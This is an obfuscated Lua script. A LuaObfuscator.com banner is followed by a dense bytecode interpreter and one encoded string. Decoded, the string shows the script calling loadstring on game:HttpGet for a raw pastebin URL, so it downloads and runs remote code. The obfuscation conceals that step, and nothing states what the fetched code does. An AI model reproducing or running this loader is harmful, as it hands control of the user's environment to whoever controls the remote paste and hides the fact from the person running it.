--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v101=v5(v86,v19);v19=nil;return v101;else return v86;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v87=0 -0 ;local v88;while true do if (v87==(0 -(1065 -(68 + 997)))) then v88=(v31/((3 -1)^(v32-((1272 -(226 + 1044)) -1))))%(((2704 -2083) -(555 + (181 -(32 + 85))))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v88-(v88%(1 + 0 + 0)) ;end end else local v89=0 + 0 ;local v90;while true do if ((877 -(282 + 595))==v89) then v90=2^(v32-(1638 -(1523 + 114))) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or (0 -0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + (180 -(67 + 113)) ;local v36;local v37;while true do if (v35==(958 -(892 + 65))) then return (v37 * (610 -354)) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (3 -1) ;v35=351 -(87 + 263) ;end end end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if ((1 + 0)==v38) then return (v42 * ((38844656 + 27836175) -49903615)) + (v41 * (66488 -(802 + 150))) + (v40 * 256) + v39 ;end if (v38==(0 -(0 -0))) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + 1 ;v38=998 -(915 + 82) ;end end end local function v24() local v43=v23();local v44=v23();local v45=(1424 -(630 + 793)) -0 ;local v46=(v20(v44,1188 -(1069 + (399 -281)) ,45 -25 ) * (2^(69 -37))) + v43 ;local v47=v20(v44,4 + 17 ,54 -(108 -85) );local v48=((v20(v44,1170 -(116 + 1022) )==(1 + 0 + 0)) and  -(792 -(368 + 423))) or 1 ;if (v47==((0 -0) + 0)) then if (v46==(0 -0)) then return v48 * (0 -0) ;else v47=19 -(10 + 8) ;v45=(1747 -(760 + 987)) -0 ;end elseif (v47==(2489 -(416 + 26))) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(2103 -(1020 + 60)) ) * (v45 + (v46/(2^52))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1913 -(1789 + 124))) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v68=767 -(745 + 21) , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (3~=v52) then else v59=nil;v60=nil;v52=757 -(239 + 514) ;end if (v52~=(3 + 1)) then else v61=nil;while true do if (v53==(2 + 1)) then v60=nil;v61=nil;v53=1333 -(797 + 532) ;end if (v53==(0 + 0)) then local v99=0;while true do if (v99==0) then v54=449 -(108 + 341) ;v55=nil;v99=1 + 0 ;end if (v99==(2 -1)) then v53=1;break;end end end if (v53==(1206 -(373 + 829))) then while true do if (v54~=(731 -(476 + 255))) then else local v102=0;while true do if (v102~=(1494 -(711 + 782))) then else v54=1131 -(369 + 761) ;break;end if (v102==(0 + 0)) then v55=469 -(270 + 199) ;v56=nil;v102=1 + 0 ;end end end if (3~=v54) then else v61=nil;while true do local v107=0 -0 ;local v108;local v109;while true do if (v107~=(2 -1)) then else while true do if (v108~=(0 -0)) then else v109=0 + 0 ;while true do if (v109~=(238 -(64 + 174))) then else local v155=0;while true do if (v155==(0 + 0)) then if (v55~=(2 -0)) then else local v161=0;local v162;local v163;while true do if (v161==(0 + 0)) then v162=0 -0 ;v163=nil;v161=1 + 0 ;end if (v161~=(337 -(144 + 192))) then else while true do if (v162~=(216 -(42 + 174))) then else v163=0 + 0 ;while true do if (v163==1) then for v174=1 + 0 ,v23() do local v175=0 + 0 ;local v176;local v177;local v178;local v179;while true do if (v175==2) then while true do if (0==v176) then v177=0 + 0 ;v178=nil;v176=1;end if (v176~=1) then else v179=nil;while true do if (v177==(0 -0)) then local v187=1504 -(363 + 1141) ;while true do if (v187~=0) then else local v193=1580 -(1183 + 397) ;while true do if (v193==(0 -0)) then v178=0 -0 ;v179=nil;v193=1;end if (v193==1) then v187=1;break;end end end if (v187==1) then v177=1 -0 ;break;end end end if (v177~=(1 + 0)) then else while true do if (v178~=(0 + 0)) then else v179=v21();if (v20(v179,506 -(351 + 154) ,1976 -(1913 + 62) )==(0 + 0)) then local v194=1574 -(1281 + 293) ;local v195;local v196;local v197;local v198;local v199;while true do if (v194~=(0 -0)) then else v195=1933 -(565 + 1368) ;v196=nil;v194=3 -2 ;end if (v194==(4 -2)) then v199=nil;while true do if (v195~=(1559 -(1381 + 178))) then else local v201=1661 -(1477 + 184) ;while true do if (v201==0) then v196=0 + 0 ;v197=nil;v201=1;end if (v201~=1) then else v195=1 -0 ;break;end end end if (v195~=(1 + 0)) then else v198=nil;v199=nil;v195=1 + 1 ;end if (v195==(858 -(564 + 292))) then while true do if ((0 -0)~=v196) then else local v202=0 -0 ;local v203;while true do if (v202~=0) then else v203=304 -(244 + 60) ;while true do if (1~=v203) then else v196=1 + 0 ;break;end if ((0 + 0)==v203) then local v212=0;local v213;while true do if (v212~=(476 -(41 + 435))) then else v213=0 + 0 ;while true do if (v213~=(0 -0)) then else local v219=1001 -(938 + 63) ;while true do if (1~=v219) then else v213=1;break;end if (v219~=(0 + 0)) then else v197=v20(v179,1127 -(936 + 189) ,1 + 2 );v198=v20(v179,1617 -(1565 + 48) ,6);v219=1;end end end if (v213~=(1456 -(990 + 465))) then else v203=1;break;end end break;end end end end break;end end end if (2~=v196) then else local v204=0 + 0 ;local v205;local v206;while true do if (v204~=(1139 -(782 + 356))) then else while true do if (v205==(267 -(176 + 91))) then v206=0 -0 ;while true do if (v206~=(1 -0)) then else v196=1095 -(975 + 117) ;break;end if (v206~=0) then else local v215=1875 -(157 + 1718) ;while true do if (0==v215) then local v220=0 + 0 ;while true do if (v220==(3 -2)) then v215=3 -2 ;break;end if (v220==(1018 -(697 + 321))) then if (v20(v198,2 -1 ,1 -0 )==(3 -2)) then v199[4 -2 ]=v61[v199[1 + 1 ]];end if (v20(v198,2,2)==(1 -0)) then v199[7 -4 ]=v61[v199[1230 -(322 + 905) ]];end v220=1;end end end if (v215~=(612 -(602 + 9))) then else v206=1190 -(449 + 740) ;break;end end end end break;end end break;end if ((872 -(826 + 46))==v204) then v205=947 -(245 + 702) ;v206=nil;v204=1995 -(109 + 1885) ;end end end if (v196~=(9 -6)) then else if (v20(v198,1 + 2 ,1901 -(260 + 1638) )==1) then v199[4]=v61[v199[4]];end v56[v174]=v199;break;end if (v196~=(441 -(382 + 58))) then else local v208=0 -0 ;while true do if (v208~=(1 + 0)) then else v196=817 -(98 + 717) ;break;end if (v208~=(826 -(802 + 24))) then else local v211=0;while true do if (v211~=1) then else v208=1 -0 ;break;end if (v211~=(0 -0)) then else local v214=0 -0 ;while true do if (v214~=(1206 -(902 + 303))) then else v211=1 -0 ;break;end if (v214==0) then v199={v22(),v22(),nil,nil};if (v197==(0 + 0)) then local v216=0;local v217;local v218;while true do if ((1 + 0)~=v216) then else while true do if ((1690 -(1121 + 569))==v217) then v218=214 -(22 + 192) ;while true do if (v218~=(683 -(483 + 200))) then else v199[1466 -(1404 + 59) ]=v22();v199[11 -7 ]=v22();break;end end break;end end break;end if (v216~=0) then else local v222=0;while true do if (v222==1) then v216=1;break;end if (0==v222) then v217=0;v218=nil;v222=1;end end end end elseif (v197==(3 -2)) then v199[8 -5 ]=v23();elseif (v197==(1 + 1)) then v199[2 + 1 ]=v23() -(2^(21 -5)) ;elseif (v197~=3) then else local v228=0 + 0 ;local v229;local v230;local v231;while true do if ((765 -(468 + 297))~=v228) then else v229=0 + 0 ;v230=nil;v228=563 -(334 + 228) ;end if (1~=v228) then else v231=nil;while true do if (v229~=1) then else while true do if (v230==0) then v231=0;while true do if (v231==(1433 -(797 + 636))) then v199[14 -11 ]=v23() -(2^(53 -37)) ;v199[8 -4 ]=v22();break;end end break;end end break;end if (v229==(0 -0)) then local v234=0 + 0 ;while true do if (v234==(237 -(141 + 95))) then v229=1 + 0 ;break;end if (v234==0) then v230=0 + 0 ;v231=nil;v234=2 -1 ;end end end end break;end end end v214=327 -(192 + 134) ;end end end end end end end end break;end end break;end if (v194==(2 -1)) then v197=nil;v198=nil;v194=2 + 0 ;end end end break;end end break;end end break;end end break;end if (1~=v175) then else v178=nil;v179=nil;v175=1 + 1 ;end if (v175==0) then v176=0 + 0 ;v177=nil;v175=2 -1 ;end end end v55=3 + 0 ;break;end if (v163~=(0 + 0)) then else local v170=0 -0 ;while true do if (v170==(552 -(83 + 468))) then v163=1 + 0 ;break;end if (v170==(163 -(92 + 71))) then for v181=1,v60 do local v182=0;local v183;local v184;local v185;while true do if (v182~=(1 + 0)) then else v185=nil;while true do if (v183==(2 -1)) then if (v184==(1 -0)) then v185=v21()~=0 ;elseif (v184==(767 -(574 + 191))) then v185=v24();elseif (v184==3) then v185=v25();end v61[v181]=v185;break;end if (v183==(0 + 0)) then local v189=0 -0 ;local v190;while true do if (v189==(0 + 0)) then v190=0;while true do if (1~=v190) then else v183=1 + 0 ;break;end if (v190==(0 + 0)) then local v200=0 -0 ;while true do if (v200~=(850 -(254 + 595))) then else v190=1912 -(340 + 1571) ;break;end if (v200~=0) then else v184=v21();v185=nil;v200=127 -(55 + 71) ;end end end end break;end end end end break;end if (v182==(0 -0)) then v183=0;v184=nil;v182=2 -1 ;end end end v59[3]=v21();v170=1791 -(573 + 1217) ;end end end end break;end end break;end end end if ((8 -5)~=v55) then else local v164=0 + 0 ;local v165;local v166;while true do if (v164~=(0 -0)) then else v165=0;v166=nil;v164=940 -(714 + 225) ;end if (v164==1) then while true do if (v165~=(0 -0)) then else v166=0 -0 ;while true do if (v166==(0 + 0)) then local v171=0 -0 ;local v172;while true do if (v171==(806 -(118 + 688))) then v172=236 -(46 + 190) ;while true do if (0~=v172) then else local v186=0;while true do if (v186==0) then for v191=49 -(25 + 23) ,v23() do v57[v191-(96 -(51 + 44)) ]=v28();end return v59;end end end end break;end end end end break;end end break;end end end v155=1 + 0 ;end if (v155==(1 + 0)) then v109=727 -(228 + 498) ;break;end end end if (v109~=(1887 -(927 + 959))) then else if (v55~=(1 + 0)) then else local v158=0 -0 ;while true do if (0~=v158) then else local v167=732 -(16 + 716) ;while true do if (v167~=0) then else v59={v56,v57,nil,v58};v60=v23();v167=286 -(175 + 110) ;end if (v167==(2 -1)) then v158=4 -3 ;break;end end end if (v158==(1270 -(231 + 1038))) then v61={};v55=2 + 0 ;break;end end end if (v55==(1162 -(171 + 991))) then local v159=0;local v160;while true do if ((0 -0)==v159) then v160=1796 -(503 + 1293) ;while true do if ((2 -1)==v160) then v58={};v55=1;break;end if (v160==0) then local v168=0 + 0 ;local v169;while true do if (v168==0) then v169=0;while true do if ((0 -0)~=v169) then else local v173=0 + 0 ;while true do if (v173==(0 -0)) then v56={};v57={};v173=1062 -(810 + 251) ;end if (v173~=(1 + 0)) then else v169=1 + 0 ;break;end end end if (v169==1) then v160=1249 -(111 + 1137) ;break;end end break;end end end end break;end end end break;end end break;end end break;end if (v107==(0 + 0)) then v108=533 -(43 + 490) ;v109=nil;v107=1;end end end break;end if (v54~=(734 -(711 + 22))) then else local v103=0 -0 ;local v104;while true do if (v103~=(0 + 0)) then else v104=523 -(423 + 100) ;while true do if ((859 -(240 + 619))~=v104) then else local v148=0 + 0 ;while true do if (v148==(1 -0)) then v104=2 -1 ;break;end if (v148~=(0 + 0)) then else v57=nil;v58=nil;v148=1;end end end if (v104==1) then v54=2;break;end end break;end end end if (v54==(1746 -(1344 + 400))) then local v105=771 -(326 + 445) ;local v106;while true do if (v105~=(405 -(255 + 150))) then else v106=0;while true do if (v106~=(2 -1)) then else v54=3 + 0 ;break;end if (v106==(0 + 0)) then local v149=881 -(614 + 267) ;while true do if (v149==(33 -(19 + 13))) then v106=4 -3 ;break;end if ((0 -0)==v149) then v59=nil;v60=nil;v149=1740 -(404 + 1335) ;end end end end break;end end end end break;end if (v53==1) then v56=nil;v57=nil;v53=408 -(183 + 223) ;end if (2~=v53) then else local v100=0 -0 ;while true do if (v100==(0 + 0)) then v58=nil;v59=nil;v100=1;end if (v100==1) then v53=3;break;end end end end break;end if ((1 + 1)==v52) then v57=nil;v58=nil;v52=3;end if (v52==(1 -0)) then v55=nil;v56=nil;v52=2;end if (v52~=0) then else v53=337 -(10 + 327) ;v54=nil;v52=1;end end end local function v29(v62,v63,v64) local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...) local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v91=0,v78 do if (v91>=v72) then v76[v91-v72 ]=v77[v91 + 1 ];else v80[v91]=v77[v91 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v92=0;while true do if (v92==1) then if (v83<=6) then if (v83<=2) then if (v83<=0) then local v110=0;local v111;while true do if (v110==0) then v111=v82[2];v80[v111]=v80[v111](v13(v80,v111 + 1 ,v75));break;end end elseif (v83>1) then local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==0) then v116=v82[2];v117,v118=v73(v80[v116](v13(v80,v116 + 1 ,v82[3])));v115=1;end if (v115==2) then for v151=v116,v75 do local v152=0;while true do if (0==v152) then v119=v119 + 1 ;v80[v151]=v117[v119];break;end end end break;end if (v115==1) then v75=(v118 + v116) -1 ;v119=0;v115=2;end end else local v120=v82[2];local v121,v122=v73(v80[v120](v13(v80,v120 + 1 ,v82[3])));v75=(v122 + v120) -1 ;local v123=0;for v141=v120,v75 do local v142=0;while true do if (v142==0) then v123=v123 + 1 ;v80[v141]=v121[v123];break;end end end end elseif (v83<=4) then if (v83==3) then do return;end else v80[v82[2]]();end elseif (v83>5) then v80[v82[2]]=v82[3];else local v126=v82[2];v80[v126]=v80[v126](v13(v80,v126 + 1 ,v75));end elseif (v83<=9) then if (v83<=7) then local v112=0;local v113;local v114;while true do if (v112==1) then v80[v113 + 1 ]=v114;v80[v113]=v114[v82[4]];break;end if (v112==0) then v113=v82[2];v114=v80[v82[3]];v112=1;end end elseif (v83==8) then v80[v82[2]]=v82[3];else local v130=v82[2];local v131=v80[v82[3]];v80[v130 + 1 ]=v131;v80[v130]=v131[v82[4]];end elseif (v83<=11) then if (v83>10) then do return;end else v80[v82[2]]();end elseif (v83==12) then v80[v82[2]]=v64[v82[3]];else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;break;end if (v92==0) then v82=v70[v74];v83=v82[1];v92=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F644E67767441304A00083O00120D3O00013O00120D000100023O002009000100010003001206000300044O0002000100039O0000022O00043O000100012O000B3O00017O00",v9(),...);
